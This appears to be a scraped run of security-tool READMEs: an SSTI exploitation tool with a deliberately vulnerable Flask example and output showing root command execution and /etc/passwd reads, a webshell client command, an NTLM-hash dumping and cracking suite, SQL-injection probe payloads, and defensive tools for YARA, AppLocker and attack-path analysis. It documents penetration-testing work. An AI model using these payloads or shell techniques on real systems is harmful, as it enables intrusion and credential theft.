python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd

Demo:



Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors


Visually inspect all of the regex matches (and their sexier, more cloak and dagger cousins, the YARA matches) found in binary data and/or text. See what happens when you force various character encodings upon those matched bytes. With colors.


Quick Start

pipx install yaralyzer

# Scan against YARA definitions in a file:
yaralyze --yara-rules /secret/vault/sigmunds_malware_rules.yara lacan_buys_the_dip.pdf

# Scan against an arbitrary regular expression:
yaralyze --regex-pattern 'good and evil.*of\s+\w+byte' the_crypto_archipelago.exe

# Scan against an arbitrary YARA hex pattern
yaralyze --hex-pattern 'd0 93 d0 a3 d0 [-] 9b d0 90 d0 93' one_day_in_the_life_of_ivan_cryptosovich.bin

What It Do

  1. See the actual bytes your YARA rules are matching. No more digging around copy/pasting the start positions reported by YARA into your favorite hex editor. Displays both the bytes matched by YARA as well as a configurable number of bytes before and after each match in hexadecimal and "raw" python string representation.
  2. Do the same for byte patterns and regular expressions without writing a YARA file. If you're too lazy to write a YARA file but are trying to determine, say, whether there's a regular expression hidden somewhere in the file you could scan for the pattern '/.+/' and immediately get a window into all the bytes in the file that live between front slashes. Same story for quotes, BOMs, etc. Any regex YARA can handle is supported so the sky is the limit.
  3. Detect the possible encodings of each set of matched bytes. The chardet library is a sophisticated library for guessing character encodings and it is leveraged here (see the short sketch after this list).
  4. Display the result of forcing various character encodings upon the matched areas. Several default character encodings will be forcibly attempted in the region around the match. chardet will also be leveraged to see if the bytes fit the pattern of any known encoding. If chardet is confident enough (configurable), an attempt at decoding the bytes using that encoding will be displayed.
  5. Export the matched regions/decodings to SVG, HTML, and colored text files. Show off your ASCII art.
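
A quick illustration of the kind of guess chardet makes (plain chardet usage, not Yaralyzer's own code; the sample text is made up):

import chardet

sample = "Привет, мир! Просто пример текста.".encode("utf-8")
print(chardet.detect(sample))
# typically something like {'encoding': 'utf-8', 'confidence': ..., 'language': ...}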

Why It Do

The Yaralyzer's functionality was extracted from The Pdfalyzer when it became apparent that visualizing and decoding pattern matches in binaries had more utility than just in a PDF analysis tool.

YARA, for those who are unaware1, is branded as a malware analysis/alerting tool but it's actually both a lot more and a lot less than that. One way to think about it is that YARA is a regular expression matching engine on steroids. It can locate regex matches in binaries like any regex engine but it can also do far wilder things like combine regexes in logical groups, compare regexes against all 256 XORed versions of a binary, check for base64 and other encodings of the pattern, and more. Maybe most importantly of all YARA provides a standard text based format for people to share their 'roided regexes with the world. All these features are particularly useful when analyzing or reverse engineering malware, whose authors tend to invest a great deal of time into making stuff hard to find.
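
To make that concrete, here is a small sketch using the yara-python package (which Yaralyzer builds on); the rule and data are invented for illustration and are not from Yaralyzer:

import yara  # pip install yara-python

RULE = r'''
rule demo {
    strings:
        $plain = "secret" xor        // also match every single-byte XOR of the string
        $b64   = "secret" base64     // also match base64 encodings of the string
        $re    = /https?:\/\/[a-zA-Z0-9.\/-]+/   // a plain regular expression
    condition:
        any of them
}
'''

rules = yara.compile(source=RULE)
for match in rules.match(data=b"payload hidden at https://example.com/x"):
    print(match.rule)   # -> demo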

But... that's also all YARA does. Everything else is up to the user. YARA's just a match engine and if you don't know what to match (or even what character encoding you might be able to match in) it only gets you so far. I found myself a bit frustrated trying to use YARA to look at all the matches of a few critical patterns:

  1. Bytes between escaped quotes (\".+\" and \'.+\')
  2. Bytes between front slashes (/.+/). Front slashes demarcate a regular expression in many implementations and I was trying to see if any of the bytes matching this pattern were actually regexes.

YARA just tells you the byte position and the matched string but it can't tell you whether those bytes are UTF-8, UTF-16, Latin-1, etc. etc. (or none of the above). I also found myself wanting to understand what was going in the region of the matched bytes and not just in the matched bytes. In other words I wanted to scope the bytes immediately before and after whatever got matched.

Enter The Yaralyzer, which lets you quickly scan the regions around matches while also showing you what those regions would look like if they were forced into various character encodings.

It's important to note that The Yaralyzer isn't a full on malware reversing tool. It can't do all the things a tool like CyberChef does and it doesn't try to. It's more intended to give you a quick visual overview of suspect regions in the binary so you can hone in on the areas you might want to inspect with a more serious tool like CyberChef.

Installation

Install it with pipx or pip3. pipx is a marginally better solution as it guarantees any packages installed with it will be isolated from the rest of your local python environment. Of course if you don't really have a local python environment this is a moot point and you can feel free to install with pip/pip3.

pipx install yaralyzer

Usage

Run yaralyze -h to see the command line options (screenshot below).

For info on exporting SVG images, HTML, etc., see Example Output.

Configuration

If you place a file called .yaralyzer in your home directory or the current working directory, then environment variables specified in that .yaralyzer file will be added to the environment each time yaralyzer is invoked. This provides a mechanism for permanently configuring various command line options so you can avoid typing them over and over. See the example file .yaralyzer.example to see which options can be configured this way.

Only one .yaralyzer file will be loaded and the working directory's .yaralyzer takes precedence over the home directory's .yaralyzer.

As A Library

Yaralyzer is the main class. It has a variety of constructors supporting:

  1. Precompiled YARA rules
  2. Creating a YARA rule from a string
  3. Loading YARA rules from files
  4. Loading YARA rules from all .yara file in a directory
  5. Scanning bytes
  6. Scanning a file

Should you want to iterate over the BytesMatch (like a re.Match object for a YARA match) and BytesDecoder (tracks decoding attempt stats) objects returned by The Yaralyzer, you can do so like this:

from yaralyzer.yaralyzer import Yaralyzer

yaralyzer = Yaralyzer.for_rules_files(['/secret/rule.yara'], 'lacan_buys_the_dip.pdf')

for bytes_match, bytes_decoder in yaralyzer.match_iterator():
    do_stuff()

Example Output

The Yaralyzer can export visualizations to HTML, ANSI colored text, and SVG vector images using the file export functionality that comes with Rich. SVGs can be turned into png format images with a tool like Inkscape or cairosvg. In our experience they both work though we've seen some glitchiness with cairosvg.

PyPi Users: If you are reading this document on PyPi be aware that it renders a lot better over on GitHub. Pretty pictures, footnotes that work, etc.

Raw YARA match result:

Display hex, raw python string, and various attempted decodings of both the match and the bytes before and after the match (configurable):

Bonus: see what chardet.detect() thinks about the likelihood your bytes are in a given encoding/language:

TODO

  • highlight decodes done at chardet's behest
  • deal with repetitive matches


SSTImap - Automatic SSTI Detection Tool With Interactive Interface


SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

This tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation.

Sandbox break-out techniques came from:

This tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.


Differences with Tplmap

Even though this software is based on Tplmap's code, backwards compatibility is not provided.

  • Interactive mode (-i) allowing for easier exploitation and detection
  • Base language eval()-like shell (-x) or single command (-X) execution
  • Added a new payload for Smarty without {php}{/php} enabled. The old payload is available as Smarty_unsecure.
  • User-Agent can be randomly selected from a list of desktop browser agents using -A
  • SSL verification can now be enabled using -V
  • Short versions added to all arguments
  • Some old command line arguments were changed, check -h for help
  • Code is changed to use newer python features
  • Burp Suite extension temporarily removed, as Jython doesn't support Python3

Server-Side Template Injection

This is an example of a simple website written in Python using the Flask framework and the Jinja2 template engine. It integrates the user-supplied variable name in an unsafe way: it is concatenated into the template string before rendering.

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    # SSTI VULNERABILITY:
    template = f"Hello, {name}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Not only does this way of using templates create an XSS vulnerability, it also allows the attacker to inject template code that will be executed on the server, leading to SSTI.

$ curl -g 'https://www.target.com/page?name=John'
Hello John!<br>
OS type: posix
$ curl -g 'https://www.target.com/page?name={{7*7}}'
Hello 49!<br>
OS type: posix

User-supplied input should be introduced in a safe way through rendering context:

from flask import Flask, request, render_template_string
import os

app = Flask(__name__)

@app.route("/page")
def page():
    name = request.args.get('name', 'World')
    template = "Hello, {{name}}!<br>\n" \
               "OS type: {{os}}"
    return render_template_string(template, name=name, os=os.name)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

Predetermined mode

SSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different template engines.

After the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.

To check the URL, you can use -u argument:

$ ./sstimap.py -u https://example.com/page?name=John

[SSTImap ASCII-art banner]
[*] Version: 1.0
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Rerun SSTImap providing one of the following options:
--os-shell Prompt for an interactive operating system shell
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port
--reverse-shell HOST PORT Send a shell back to the attacker's port
--upload LOCAL REMOTE Upload files to the server
--download REMOTE LOCAL Download remote files

Use --os-shell option to launch a pseudo-terminal on the target.

$ ./sstimap.py -u https://example.com/page?name=John --os-shell

[SSTImap ASCII-art banner]
[*] Version: 0.6#dev
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program


[*] Testing if GET parameter 'name' is injectable
[*] Smarty plugin is testing rendering with tag '*'
...
[*] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] SSTImap identified the following injection point:

GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux
Technique: render
Capabilities:

Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ whoami
root
posix-linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

To get a full list of options, use --help argument.

Interactive mode

In interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use -i argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.

Some commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial -u argument or url command. After that, you can use run command to check URL for SSTI.

If SSTI was found, commands can be used to start the exploitation. You get the same exploitation capabilities as in the predetermined mode, but you can use Ctrl+C to abort them without stopping the program.

Test results remain valid until the target URL is changed, so you can easily switch between exploitation methods without re-running the detection test every time.

To get a full list of interactive commands, use command help in interactive mode.

Supported template engines

SSTImap supports multiple template engines and eval()-like injections.

New payloads are welcome in PRs.

Engine RCE Blind Code evaluation File read File write
Mako ✓ ✓ Python ✓ ✓
Jinja2 ✓ ✓ Python ✓ ✓
Python (code eval) ✓ ✓ Python ✓ ✓
Tornado ✓ ✓ Python ✓ ✓
Nunjucks ✓ ✓ JavaScript ✓ ✓
Pug ✓ ✓ JavaScript ✓ ✓
doT ✓ ✓ JavaScript ✓ ✓
Marko ✓ ✓ JavaScript ✓ ✓
JavaScript (code eval) ✓ ✓ JavaScript ✓ ✓
Dust (<= dustjs-helpers@1.5.0) ✓ ✓ JavaScript ✓ ✓
EJS ✓ ✓ JavaScript ✓ ✓
Ruby (code eval) ✓ ✓ Ruby ✓ ✓
Slim ✓ ✓ Ruby ✓ ✓
ERB ✓ ✓ Ruby ✓ ✓
Smarty (unsecured) ✓ ✓ PHP ✓ ✓
Smarty (secured) ✓ ✓ PHP ✓ ✓
PHP (code eval) ✓ ✓ PHP ✓ ✓
Twig (<=1.19) ✓ ✓ PHP ✓ ✓
Freemarker ✓ ✓ Java ✓ ✓
Velocity ✓ ✓ Java ✓ ✓
Twig (>1.19) × × × × ×
Dust (> dustjs-helpers@1.5.0) × × × × ×

Burp Suite Plugin

Currently, Burp Suite only works with Jython as a way to execute Python 2 extensions; Python 3 functionality is not provided.

Future plans

If you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.

  • Make template and base language evaluation functionality more uniform
  • Add more payloads for different engines
  • Short arguments as interactive commands?
  • Automatic languages and engines import
  • Engine plugins as objects of Plugin class?
  • JSON/plaintext API modes for scripting integrations?
  • Argument to remove escape codes?
  • Spider/crawler automation
  • Better integration for Python scripts
  • More POST data types support
  • Payload processing scripts


BlueHound - Tool That Helps Blue Teams Pinpoint The Security Issues That Actually Matter


BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.
It is a fork of NeoDash, reimagined to make it suitable for defensive security purposes.

To get started with BlueHound, check out our introductory video, blog post and Nodes22 conference talk.


BlueHound supports presenting your data as tables, graphs, bar charts, line charts, maps and more. It contains a Cypher editor to directly write the Cypher queries that populate the reports. You can save dashboards to your database, and share them with others.

Main Features

  1. Full Automation: The entire cycle of collection, analysis and reporting is basically done with a click of a button.
  2. Community Driven: BlueHound configuration can be exported and imported by others. Sharing of knowledge, best practices, collection methodologies and more, built-into the tool itself.
  3. Easy Reporting: Creating customized reports can be done intuitively, without the need to write any code.
  4. Easy Customization: Any custom collection method can be added into BlueHound. Users can even add their own custom parameters or custom icons for their graphs.

Getting Started

ROST ISO

BlueHound can be used as part of the ROST image, which comes pre-configured with everything you need (BlueHound, Neo4j, BloodHound, and a sample dataset).
To load ROST, create a new virtual machine, and install it from the ISO like you would for a new Windows host.

BlueHound Binary

If you already have a Neo4j instance running, you can download a pre-compiled version of BlueHound from our release page. Just download the zip file suitable to your OS version, extract it, and run the binary.

Using BlueHound

  1. Connect to your Neo4j server
  2. Download SharpHound, ShotHound and the Vulnerability Scanner report parser
  3. Use the Data Import section to collect & import data into your Neo4j database.
  4. Once you have data loaded, you can use the Configurations tab to set up the basic information that is used by the queries (e.g. Domain Admins group, crown jewels servers).
  5. Finally, the Queries section can be used to prepare the reports.

BlueHound How-To

Data Collection

The Data Import Tools section can be used to collect data with a click of a button. By default, BlueHound comes preconfigured with SharpHound, ShotHound, and the Vulnerability Scanners script. Additional tools can be added for more data collection. To get started:

  1. Download the relevant tools using the globe icon
  2. Configure the tool path & arguments for each tool
  3. Run the tools

The built-in tools can be configured to automatically upload the results to your Neo4j instance.

Running & Viewing Queries

To get results for a chart, either use the Refresh icon to run a specific query, or use the Query Runner section to run queries in batches. The results will be cached even after closing BlueHound, and can be run again to get updated results.
Some charts have an Info icon which explain the query and/or provide links to additional information.

Adding & Editing Queries

You can edit the query for new and/or existing charts by using the Settings icon on the top right section of the chart. Here you can use any parameters configured with a Param Select chart, and any Edge Filtering string (see section below).

Edge Filtering

Using the Edge Filtering section, you can filter out specific relationship types for all queries that use the relevant string in their query. For example, ":FILTERED_EDGES" can be used to filter by all the selection filters.
You can also filter by a specific category (see the Info icon) or even define your own custom edge filters.

Import & Export Config

The Export Config and Import Config sections can be used to save & load your dashboard and configurations as a backup, and even shared between users to collaborate and contribute insightful queries to the security community. Donโ€™t worry, your credentials and data wonโ€™t be exported.

Note: any arguments for data import tools are also exported, so make sure you remove any secrets before sharing your configuration.

Settings

The Settings section allows you to set some global limits on query execution โ€“ maximum query time and a limit for returned results.

Technical Info

BlueHound is a fork of NeoDash, built with React and use-neo4j. It uses charts to power some of the visualizations. You can also extend NeoDash with your own visualizations. Check out the developer guide in the project repository.

Developer Guide

Run & Build using npm

BlueHound is built with React. You'll need npm installed to run the web app.

Use a recent version of npm and node to build BlueHound. The application has been tested with npm 8.3.1 & node v17.4.0.

To run the application in development mode:

  • clone this repository.
  • open a terminal and navigate to the directory you just cloned.
  • execute npm install to install the necessary dependencies.
  • execute npm run dev to run the app in development mode.
  • the application should be available at http://localhost:3000.

To build the app for production:

  • follow the steps above to clone the repository and install dependencies.
  • execute npm run build. This will create a build folder in your project directory.
  • deploy the contents of the build folder to a web server. You should then be able to run the web app.

Questions / Suggestions

We are always open to ideas, comments, and suggestions regarding future versions of BlueHound, so if you have ideas, donโ€™t hesitate to reach out to us at support@zeronetworks.com or open an issue/pull request on GitHub.



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph databaseโ€”normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the โ€œaggregation and synthesisโ€ layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions on GitHub issues. We also have a public slack channel on the OpenSSF slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for educational purposes.

Avoid using it on a production Active Directory (AD) domain.

No contributor incurs any responsibility for any use of it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionality

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register an AD domain for analysis in the app

  • See the statuses of the domain analysis processes

  • Dump and brute-force NTLM hashes from the registered AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list the ones whose passwords never expire

  • Analyze AD domain accounts by their NTLM password hashes to find accounts and domains where passwords are reused (see the sketch below)
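As a rough illustration of that last check, the sketch below groups accounts by NT hash and flags hashes shared by more than one account. This is not DC Sonar's code; the input records are hypothetical:

from collections import defaultdict

# Hypothetical (domain, username, nt_hash) records produced by the dumping step.
records = [
    ("CORP", "alice", "32ed87bdb5fdc5e9cba88547376818d4"),
    ("CORP", "bob", "32ed87bdb5fdc5e9cba88547376818d4"),
    ("LAB", "svc_backup", "8846f7eaee8fb117ad06bdd830b7586c"),
]

by_hash = defaultdict(list)
for domain, user, nt_hash in records:
    by_hash[nt_hash].append(f"{domain}\\{user}")

# A hash shared by several accounts means the same password is reused.
for nt_hash, accounts in by_hash.items():
    if len(accounts) > 1:
        print(nt_hash, "reused by:", ", ".join(accounts))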

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and account with the username "user".

The app will install to /home/user/dc-sonar.

Future releases may provide a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the latest release to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide username, mail and password.

It will ask for information for creating a self-signed SSL certificate twice. Provide required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If the Ubuntu installer asks to update itself before the VM installation, agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name Protocol Host IP Host Port Guest IP Guest Port
SSH TCP 127.0.0.1 2222 10.0.2.15 22
RabbitMQ management console TCP 127.0.0.1 15672 10.0.2.15 15672
Django Server TCP 127.0.0.1 8000 10.0.2.15 8000
NTLM Scrutinizer TCP 127.0.0.1 5000 10.0.2.15 5000
PostgreSQL TCP 127.0.0.1 25432 10.0.2.15 5432

Config Windows

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Log out and log back in with the user account you are using.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit of the psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the following lines to allow connections from the host machine to PostgreSQL, save the changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change the parameters specified below, save the changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to created databases using admin account and client such as DBeaver from Windows.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Install Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create the venv one level above, as VirtualBox does not allow creating it inside shared folders.

Go to the home directory where the shared folders are located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and login as created Django user.



Get-AppLockerEventlog - Script For Fetching Applocker Event Log By Parsing The Win-Event Log


This script parses all the channels of the Windows event log to extract the entries related to AppLocker. It gathers all the important pieces of information about these events for forensic or threat-hunting purposes, or even for troubleshooting. Here are the logs we fetch from win-event:

  • EXE and DLL,
  • MSI and Script,
  • Packaged app-Deployment,
  • Packaged app-Execution.

The output:

  • The result will be displayed on the screen

  • And the result will be saved to a csv file: AppLocker-log.csv

The juicy and useful information you will get with this script are:

  • FileType,
  • EventID,
  • Message,
  • User,
  • Computer,
  • EventTime,
  • FilePath,
  • Publisher,
  • FileHash,
  • Package
  • RuleName,
  • LogName,
  • TargetUser.

PARAMETERS

HunType

This parameter specifies the type of events you are interested in; there are 4 possible values:

1. All

This gets all the events of AppLocker that are interesting for threat-hunting, forensic or even troubleshooting. This is the default value.

.\Get-AppLockerEventlog.ps1 -HunType All

2. Block

This gets all the events that are triggered by the action of blocking an application by AppLocker. This type is critical for threat-hunting or forensics and comes with high priority, since it indicates malicious attempts, or attempts to evade defensive mechanisms after prior malicious activity.

.\Get-AppLockerEventlog.ps1 -HunType Block |Format-Table -AutoSize

3. Allow

This gets all the events that are triggered by the action of Allowing an application by AppLocker. For threat-hunting or forensics, even the allowed applications should be monitored, in order to detect any possible bypass or configuration mistakes.

.\Get-AppLockerEventlog.ps1 -HunType Allow | Format-Table -AutoSize

4. Audit

This gets all the events generated when AppLocker would block the application if the enforcement mode were enabled (Audit mode). For threat-hunting or forensics, this could indicate any configuration mistake, neglect from the admin to switch the mode, or even a malicious action that happened in the audit phase (tuning phase).

 .\Get-AppLockerEventlog.ps1 -HunType Audit

Resource

To better understand AppLocker :

Contributing

This project welcomes contributions and suggestions.



SQLiDetector - Helps You To Detect SQL Injection "Error Based" By Sending Multiple Requests With 14 Payloads And Checking For 152 Regex Patterns For Different Databases


Simple python script supported with BurpBouty profile that helps you to detect SQL injection "Error based" by sending multiple requests with 14 payloads and checking for 152 regex patterns for different databases.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
| S|Q|L|i| |D|e|t|e|c|t|o|r|
| Coded By: Eslam Akl @eslam3kll & Khaled Nassar @knassar702
| Version: 1.0.0
| Blog: eslam3kl.medium.com
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Description

The main idea for the tool is scanning for Error Based SQL Injection by using different payloads like

'123
''123
`123
")123
"))123
`)123
`))123
'))123
')123"123
[]123
""123
'"123
"'123
\123

And match for 152 error regex patterns for different databases.
Source: https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml

How does it work?

It's very simple, just organize your steps as follows

  1. Use your subdomain grabber script or tools.
  2. Pass all collected subdomains to httpx or httprobe to get only live subs.
  3. Use your links and URLs tools to grab all waybackurls like waybackurls, gau, gauplus, etc.
  4. Use URO tool to filter them and reduce the noise.
  5. Grep to get all the links that contain parameters only. You can use Grep or GF tool.
  6. Pass the final URLs file to the tool, and it will test them.

The final schema of URLs that you will pass to the tool must be like this one

https://aykalam.com?x=test&y=fortest
http://test.com?parameter=ayhaga

Installation and Usage

Just run the following command to install the required libraries.

~/eslam3kl/SQLiDetector# pip3 install -r requirements.txt 

To run the tool itself.

# cat urls.txt
http://testphp.vulnweb.com/artists.php?artist=1

# python3 sqlidetector.py -h
